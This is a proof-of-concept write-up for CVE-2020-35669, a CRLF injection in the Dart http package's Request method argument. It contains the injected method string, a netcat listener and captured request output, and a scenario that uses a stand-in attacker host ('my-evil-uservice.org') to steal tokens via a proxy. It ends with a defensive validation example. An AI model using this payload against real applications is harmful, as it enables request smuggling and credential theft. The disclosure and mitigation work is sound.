
CVE-2020-35669 PoC: Google http package for Dart injection vulnerability

Associated Vulnerability
Title: Google http package for Dart injection vulnerability (CVE-2020-35669)
Description: An issue was discovered in the http package through 0.12.2 for Dart. If the attacker controls the HTTP method and the app is using Request directly, it's possible to achieve CRLF injection in an HTTP request.
Readme
# [CVE-2020-35669](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35669)

## dummy server
Run a dummy server in a first terminal. It listens on port 80, hence `sudo`; the syntax below is OpenBSD netcat's, traditional netcat takes `-l -p 80` instead:
```bash
sudo nc -l 127.0.0.1 80 
```

## apply the given diff
The only change points the `Uri` at the local listener instead of `google.com`, so the raw request can be captured by `nc`:
```diff
diff --git a/main.dart b/main.dart
index 8c78291..a46f4d0 100644
--- a/main.dart
+++ b/main.dart
@@ -4,7 +4,7 @@ import 'package:http/src/request.dart';
 void main() async {
   var r = Request(
       "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
-      Uri(scheme: "http", path: "/llama", host: "google.com"));
+      Uri(scheme: "http", path: "/llama", host: "localhost"));
   var rs = await r.send();
   var resp = await Response.fromStream(rs);
   print('${resp.body}');

```
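Review bot: the hunk header still shows `import 'package:http/src/request.dart';`, a package-private path under `lib/src/` that the http package does not promise to keep stable; import `package:http/http.dart` instead, which exports both `Request` and `Response`. The one-line change to `host: "localhost"` is otherwise correct: the `Uri` has no explicit port, so it defaults to 80, matching the `nc -l 127.0.0.1 80` listener.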

## run dummy app
Run `main.dart` in a second terminal:
```bash
dart run main.dart
```

## result
nc should receive the request below. The method string is upper-cased and emitted verbatim, so the injected request line and `Host: example.com` header come first, the genuine path `/llama HTTP/1.1` ends up as the value of the injected `LLAMA:` header, and the real `host: localhost` header is appended after the other headers:
```http
GET HTTP://EXAMPLE.COM/ HTTP/1.1
HOST: EXAMPLE.COM
LLAMA: /llama HTTP/1.1
user-agent: Dart/2.10 (dart:io)
accept-encoding: gzip
content-length: 0
host: localhost
```

### Important piece of code
```dart
  // The first argument is the HTTP method. CRLF sequences in it are written
  // to the wire unchanged, so a whole request line and header ride in front
  // of the real request; the Uri only supplies the host, path and headers.
  var r = Request(
      "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
      Uri(scheme: "http", path: "/llama", host: "google.com"));
  var rs = await r.send();
```

## Critical path

Assuming the diff above was not applied and the **user is behind a reverse proxy**, the website served by `example.com` is reached even though the `Uri` names `google.com`, because the proxy routes on the smuggled request line and `Host` header:
```bash
dart run main.dart
<!doctype html>
<html>
<head>
    <title>Example Domain</title>

    <meta charset="utf-8" />
    ... (rest of the example.com page)

```
### Why this is a security risk
If a developer uses `Request` to abstract HTTP calls and accepts the method parameter from the user, the user can inject headers or forge the request line and path: everything in the method string, CRLF sequences included, is written to the wire ahead of the real request.
This can be exploited in many ways and matters most when a proxy is in place. A proxy that routes on the request line or the `Host` header will forward the smuggled request to whatever host the attacker named, while the legitimate request is reduced to the value of an injected header.
Replace `example.com` with `my-evil-uservice.org` and put the victim application behind a corporate proxy: the call, together with the headers and cookies (tokens) the application attaches, is redirected to the attacker's host, so whole requests with their credentials can be stolen.
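The fix on the application side is to never let untrusted input reach the method argument unchecked. Below is an added example, not code from the PoC or from the http package, of a guard a developer could put in front of `Request`. It assumes the public `package:http/http.dart` import; the names `guardedRequest`, `unguardedRequest`, `allowedMethods` and `_token` are chosen here. It applies two layers: the RFC 7230 token grammar, which by construction excludes space, CR and LF and so defeats the CRLF payload, and a closed allow-list of the methods the application actually uses, which also rejects odd but well-formed tokens such as `TRACE`.

```dart
// Added example, not part of the PoC: guarding a user-controlled HTTP method
// before it reaches http.Request. Names (guardedRequest, unguardedRequest,
// allowedMethods, _token) are chosen here, not taken from the http package.
import 'package:http/http.dart' as http;

// Preferred control: a closed allow-list of the methods the application uses.
const Set<String> allowedMethods = {'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'PATCH'};

// Minimum control: the RFC 7230 token grammar. A token cannot contain SP, CR
// or LF, so "GET http://example.com/ HTTP/1.1\r\nHost: ..." can never pass.
//   tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*" / "+" / "-" / "." /
//           "^" / "_" / "`" / "|" / "~" / DIGIT / ALPHA
final RegExp _token = RegExp(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$");

// The vulnerable pattern from this page: the caller's string goes straight
// through to Request. Kept only for contrast.
http.Request unguardedRequest(String method, Uri url) => http.Request(method, url);

http.Request guardedRequest(String method, Uri url,
    {Set<String> allowList = allowedMethods}) {
  if (!_token.hasMatch(method)) {
    throw ArgumentError.value(method, 'method', 'not an RFC 7230 token');
  }
  if (!allowList.contains(method)) {
    throw ArgumentError.value(method, 'method', 'method not in allow-list');
  }
  return http.Request(method, url);
}

void main() {
  // Constructed inputs: the PoC's injected method plus two well-formed ones.
  const injected =
      'GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:';
  final target = Uri(scheme: 'http', host: 'localhost', path: '/llama');

  for (final method in ['GET', 'TRACE', injected]) {
    try {
      final r = guardedRequest(method, target);
      print('accepted: ${r.method} ${r.url}');
    } on ArgumentError catch (e) {
      // GET is accepted; TRACE fails the allow-list; the injected string
      // fails the token check before anything is sent.
      print('rejected: $e');
    }
  }
}
```

The token check alone already closes the CRLF hole; the allow-list is what stops a caller from turning the application into a generic request forwarder with unexpected methods. Apply the same treatment to any other request component that comes from users and is written to the wire without encoding, such as header names and values.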
File Snapshot
```
/data/pocs/936175a4e6d8326a2224fbcdf00b19ed0609de56
├── [ 376] main.dart
├── [1.8K] pubspec.lock
├── [  98] pubspec.yaml
└── [2.2K] README.md
0 directories, 4 files
```